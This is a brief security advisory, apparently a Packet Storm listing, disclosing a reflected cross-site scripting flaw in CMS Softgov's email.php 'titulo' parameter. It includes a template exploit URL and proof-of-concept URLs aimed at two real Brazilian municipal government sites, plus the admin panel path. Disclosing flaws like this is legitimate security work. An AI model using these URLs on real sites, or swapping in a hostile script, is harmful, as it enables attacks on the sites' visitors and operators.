CMS Softgov suffers from a cross site scripting vulnerability.
a250266e77b7973f183925e4e68325b67a7d54597807f8ba13e33daa4f3c4ffa[+] Cross Site Scripting on CMS SOFTGOV
[+] Date: 23/04/2014
[+] Risk: LOW
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.softgov.com.br/sg/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: email.php
[+] Exploit : http://host/estrutura/textounico/email.php?link=null%3Fpagina=t1&id=28&var=noticia&titulo=[XSS]
[+] PoC : http://www.camarariopardo.rs.gov.br/estrutura/textounico/email.php?link=null%3Fpagina=t1&id=28&var=noticia&titulo=<marquee>Felipe Andrian Peixoto</marquee>
http://www.camarauruana.go.gov.br/estrutura/textounico/email.php?link=null%3Fpagina=t1&id=28&var=noticia&titulo=<marquee>Felipe Andrian Peixoto</marquee>
[+] Admin Page: http://host/painel
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed